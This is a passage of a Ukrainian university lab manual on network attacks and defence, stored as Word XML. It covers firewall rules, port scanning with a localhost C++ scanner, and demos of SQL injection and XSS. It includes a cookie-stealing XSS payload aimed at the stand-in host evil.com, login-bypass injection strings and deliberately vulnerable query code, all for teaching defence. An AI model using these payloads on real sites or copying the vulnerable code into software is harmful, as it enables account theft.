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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Робота змінює правила брандмауера й сканує порти. Виконуйте її у віртуальній машині або на власному комп’ютері, сканувати дозволено лише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та вузли, на які є письмовий дозвіл власника: несанкціоноване сканування чужих систем порушує закон. Перед зміною правил збережіть поточні (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables-save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netsh advfirewall export</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), а наприкінці роботи видаліть усі створені правила.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КЛАСИФІКАЦІЯ МЕРЕЖЕВИХ АТАК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МЕТОЮ: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Отримання доступу (Access attacks)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Підбір паролів (Brute force)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Експлуатація вразливостей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Man-in-the-Middle (MITM)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Відмова в обслуговуванні (DoS/DDoS)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SYN Flood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UDP Flood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Amplification attacks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Розвідка (Reconnaissance)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портів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вразливостей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└── DNS enumeration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РІВНЕМ OSI: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L2: ARP spoofing, MAC flooding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L3: IP spoofing, ICMP attacks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L4: TCP/UDP attacks, port scanning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L7: SQL injection, XSS, CSRF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ЛОГІКА ПРАВИЛ БРАНДМАУЕРА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Правила перевіряються ПОСЛІДОВНО (зверху вниз)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Перше правило, що підходить, визначає долю пакета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набору правил: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ALLOW state=ESTABLISHED,RELATED (відповіді на наші запити)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ALLOW TCP dst-port=443 (HTTPS)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ALLOW TCP dst-port=80  (HTTP)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ALLOW ICMP type=8      (ping request)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DENY ALL               (все інше заборонено)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Принцип: "Deny by default" — заборонено все, крім явно дозволеного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Правило 1 робить брандмауер stateful: без нього комп'ютер не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отримав би навіть відповіді DNS-сервера на власний запит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-- Вразливий код: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login='$input' AND pass='$pass'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Атака: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login: admin'--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pass: anything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Результат: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login='admin'--' AND pass='anything'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 Коментар '--' ігнорує перевірку пароля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&lt;!-- Вразливий код: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&lt;p&gt;Привіт, &lt;?php echo $_GET['name']; ?&gt;&lt;/p&gt;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Атака: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?name=&lt;script&gt;document.location='http://evil.com/s.php?c='+document.cookie&lt;/script&gt;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Результат: виконання JavaScript у браузері жертви --&gt;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8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TCP-з'єднань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| Where-Object State -eq 'Established'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RemoteAddress, RemotePort,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RemoteAddress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UDP-з'єднань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Get-NetUDPEndpoint | Select-Object LocalPort, OwningProcess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процесу за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Get-Process -Id 1234 | Select-Object Name, Path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Активні з'єднання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-tunapl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Або через netstat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netstat -tunapl | grep ESTABLISHED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Захоплення HTTP-трафіку (any — усі інтерфейси: у сучасних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дистрибутивах мережева карта зветься не eth0, а, наприклад, enp0s3)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tcpdump -i any port 80 -A | head -50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Get-NetFirewallRule | Where-Object Enabled -eq True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DisplayName, Direction, Action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блокувати вхідні на порт 23 (Telnet)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"Block Telnet"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23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Block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дозволити вхідні на порт 443 (HTTPS)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"Allow HTTPS"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443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Allow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Видалення правила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Remove-NetFirewallRule -DisplayName "Block Telnet"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статусу брандмауера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Get-NetFirewallProfile | Select-Object Name, Enabled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 і резервна копія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-L -n -v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iptables-save | sudo tee /root/iptables.backup &gt; /dev/null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Спершу — те, без чого машина втратить мережу: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локальний інтерфейс і відповіді на з'єднання, які ми відкрили самі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-i lo -j ACCEPT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-m conntrack --ctstate ESTABLISHED,RELATED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Якщо працюєте у ВМ через SSH — дозволити його ДО заборони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22 -j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Дозволити вхідні на порти 80 і 443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80 -j ACCEPT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443 -j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Заблокувати вхідні з конкретної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-s 10.0.0.100 -j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Заборонити все інше (в кінці)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Відновити початковий стан після роботи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iptables-restore &lt; /root/iptables.backup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Два підводні камені. Перенаправлення</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo iptables-save &gt; /etc/файл</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">не спрацює: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виконує ваша оболонка без прав root, тому тут використано</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tee</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. І в Ubuntu, Debian та Fedora команда</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">насправді працює поверх nftables, а для простих правил зручніша обгортка</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ufw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ufw deny 23/tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).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Windows: перевірка прослуховуваних портів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LocalPort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ForEach-Object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$proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue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[PSCustomObject]@{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Port = $_.LocalPort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 = $proc.Name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Path = $proc.Path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| Sort-Object Port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Linux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-tuln | grep LISTEN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Сканер портів. Збірка у Visual Studio: проєкт консольного застосунку,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у властивостях додати бібліотеку ws2_32.lib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(Linker → Input → Additional Dependencies).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&lt;winsock2.h&gt;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&lt;ws2tcpip.h&gt;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#pragma comment(lib, "ws2_32.lib")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INVALID_SOCKET;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&lt;sys/socket.h&gt;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&lt;arpa/inet.h&gt;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&lt;unistd.h&gt;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int;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#define closesocket close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struct ServiceName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port;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ServiceName KNOWN_SERVICES[]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{21, "FTP"},   {22, "SSH"},   {23, "Telnet"}, {25, "SMTP"},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{53, "DNS"},   {80, "HTTP"},  {110, "POP3"},  {143, "IMAP"},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{443, "HTTPS"},{445, "SMB"},  {3306, "MySQL"},{3389, "RDP"},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{5432, "PostgreSQL"}, {8080, "HTTP-alt"}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char* serviceName(int port)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ServiceName&amp; service : KNOWN_SERVICES)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(service.port == port) return service.name;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"Unknown";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Спроба встановити з'єднання: успіх означає, що порт відкритий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isPortOpen(const std::string&amp; host, int port, int timeoutMs = 500)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socket_t sock = socket(AF_INET, SOCK_STREAM, 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(sock == INVALID_SOCK)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Обмежуємо час очікування. На Linux connect() зважає на SO_SNDTIMEO;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Windows цей параметр для connect() ігнорує, і там надійний тайм-аут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потребує неблокувального сокета й select(). Для 127.0.0.1 це не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важливо: закритий порт відповідає відмовою (RST) миттєво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DWORD timeout = static_cast&lt;DWORD&gt;(timeoutMs);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SO_SNDTIMEO,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reinterpret_cast&lt;const char*&gt;(&amp;timeout),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timeval timeout{ timeoutMs / 1000, (timeoutMs % 1000) * 1000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SO_SNDTIMEO, &amp;timeout,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sockaddr_in address{};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address.sin_family = AF_INET;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address.sin_port = htons(static_cast&lt;unsigned short&gt;(port));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inet_pton(AF_INET, host.c_str(), &amp;address.sin_addr);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opened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connect(sock, reinterpret_cast&lt;sockaddr*&gt;(&amp;address), sizeof(address))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closesocket(sock);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opened;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УВАГА: сканувати дозволено лише власний комп'ютер або вузол,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на який є письмовий дозвіл власника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target = "127.0.0.1";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std::vector&lt;int&gt; ports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21, 22, 23, 25, 53, 80, 110, 135, 139, 143,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443, 445, 993, 995, 1433, 3306, 3389, 5432, 8080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WSADATA wsa;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(WSAStartup(MAKEWORD(2, 2), &amp;wsa)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std::cerr &lt;&lt; "Не вдалося ініціалізувати Winsock\n";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"Сканування " &lt;&lt; target &lt;&lt; "...\n\n";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"Відкриті порти:\n";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found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port : ports)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(isPortOpen(target, port))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  " &lt;&lt; port &lt;&lt; "/tcp - " &lt;&lt; serviceName(port)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++found;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(found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(жодного з перевірених портів не відкрито)\n";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WSACleanup();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7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Демонстрація SQL-ін'єкції та захисту від неї.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Потрібна бібліотека SQLite: у Visual Studio додайте sqlite3.c і sqlite3.h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 проєкту (амальгама з sqlite.org) або підключіть пакет через NuGet.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"sqlite3.h"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Створює навчальну базу в пам'яті з двома обліковими записами.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Паролі лежать відкрито лише для наочності атаки; у справжній системі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зберігають хеш Argon2id (лекція «Ідентифікація та аутентифікація»)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sqlite3* setupDatabase()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sqlite3_open(":memory:", &amp;db);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const char* schema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"CREATE TABLE users ("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id INTEGER PRIMARY KEY,"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login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password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role TEXT DEFAULT 'user');"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('admin', 'secret123', 'admin');"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('user1', 'pass1', 'user');";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sqlite3_exec(db, schema, nullptr, nullptr,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db;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ВРАЗЛИВИЙ варіант: запит склеюється з рядків, дані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потрапляють у текст запиту й змінюють його структуру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vulnerableLogin(sqlite3* db, const std::string&amp; login,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query = "SELECT login, role FROM users WHERE login='" + login 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"' AND password='" + password + "'";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"[ВРАЗЛИВИЙ] Запит:\n  " &lt;&lt; query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(sqlite3_prepare_v2(db, query.c_str(), -1, &amp;stmt, nullptr) != SQLITE_OK)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Помилка SQL: " &lt;&lt; sqlite3_errmsg(db)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 (роль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1)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БЕЗПЕЧНИЙ варіант: структура запиту фіксована, дані передаються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окремо через параметри й ніколи не тлумачаться як код SQL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safeLogin(sqlite3* db, const std::string&amp; login,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query = "SELECT login, role FROM users WHERE login=? AND password=?";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Запит:\n  " &lt;&lt; query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Параметри: ('" &lt;&lt; login &lt;&lt; "', '" &lt;&lt; password &lt;&lt; "')\n";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sqlite3_prepare_v2(db, query, -1, &amp;stmt,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1, login.c_str(), -1, SQLITE_TRANSIENT);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2, password.c_str(), -1, SQLITE_TRANSIENT);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"[БЕЗПЕЧНИЙ]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setupDatabase();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Коректний вхід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vulnerableLogin(db, "admin", "secret123");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Атака SQL-ін'єкцією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Введене значення закриває лапку й додає умову, істинну завжди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injection = "' OR '1'='1";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bypassed = vulnerableLogin(db,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(bypassed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Та сама атака на параметризованому запиті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blocked = safeLogin(db,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(blocked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sqlite3_close(db);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Коректний вхід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SELECT login, role FROM users WHERE login='admin' AND password='secret123'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Вхід виконано як: admin (роль admin)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Атака SQL-ін'єкцією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SELECT login, role FROM users WHERE login='admin' AND password='' OR '1'='1'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Вхід виконано як: admin (роль admin)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ЗАХИСТ ОБІЙДЕНО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Та сама атака на параметризованому запиті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Запит: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SELECT login, role FROM users WHERE login=? AND password=?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Параметри: ('admin', '' OR '1'='1')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доступ відхилено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Подивіться на другий запит: введений «пароль» закрив лапку й дописав умову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, яка істинна для кожного рядка таблиці. Оскільки AND виконується раніше за OR, запит повертає всі записи, і перший з них — адміністратор. У параметризованому запиті те саме значення лишилося просто рядком символів, який не збігся з жодним паролем.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="26" w:name="демонстрація-xss-та-захисту"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Демонстрація XSS та захисту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Екранування для HTML: символи, що мають у розмітці особливе значення,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замінюються сутностями, і браузер показує їх як текст, а не виконує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htmlEscape(const std::string&amp; input)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input)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switch (c)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'&amp;':  out += "&amp;amp;";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'&lt;':  out += "&amp;lt;";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'&gt;':  out += "&amp;gt;";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'"':  out += "&amp;quot;";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'\'': out += "&amp;#39;";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default:   out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name = "&lt;script&gt;alert(\"XSS\")&lt;/script&gt;";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"Введено: " &lt;&lt; name &lt;&lt; "\n\n";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"Без захисту:\n  &lt;p&gt;Привіт, " &lt;&lt; name &lt;&lt; "&lt;/p&gt;\n";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-&gt; браузер виконає скрипт\n\n";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"З екрануванням:\n  &lt;p&gt;Привіт, " &lt;&lt; htmlEscape(name) &lt;&lt; "&lt;/p&gt;\n";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-&gt; браузер покаже скрипт як звичайний текст\n";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Введено: &lt;script&gt;alert("XSS")&lt;/script&gt;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Без захисту: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&lt;p&gt;Привіт, &lt;script&gt;alert("XSS")&lt;/script&gt;&lt;/p&gt;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-&gt; браузер виконає скрипт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 екрануванням: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&lt;p&gt;Привіт, &amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&lt;/p&gt;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-&gt; браузер покаже скрипт як звичайний текст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6"/>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="29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Аналіз мережевого трафіку: запустити Wireshark на основному інтерфейсі, відвідати кілька сайтів через HTTP і HTTPS, знайти HTTP-запити й порівняти, що видно у відкритому та зашифрованому трафіку; застосувати фільтри з таблиці.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Налаштування брандмауера: зберегти поточні правила, створити правило блокування й правило дозволу для портів свого варіанта, перевірити їхню дію, після чого видалити тестові правила й відновити початковий стан.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сканування портів: визначити відкриті порти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командами ОС і власним сканером, зіставити їх із процесами, що їх прослуховують.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Захист веб-застосунку: запустити демонстрацію SQL-ін’єкції та XSS, показати успішну атаку на вразливий варіант і її блокування безпечним.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9"/>
    <w:bookmarkStart w:id="30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методи захисту від мережевих атак.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:id="31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1"/>
    <w:bookmarkStart w:id="35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2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Content Security Policy?</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="33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CSP обмежує наслідки успішної XSS-атаки?</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="33"/>
    <w:bookmarkStart w:id="34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4"/>
    <w:bookmarkEnd w:id="35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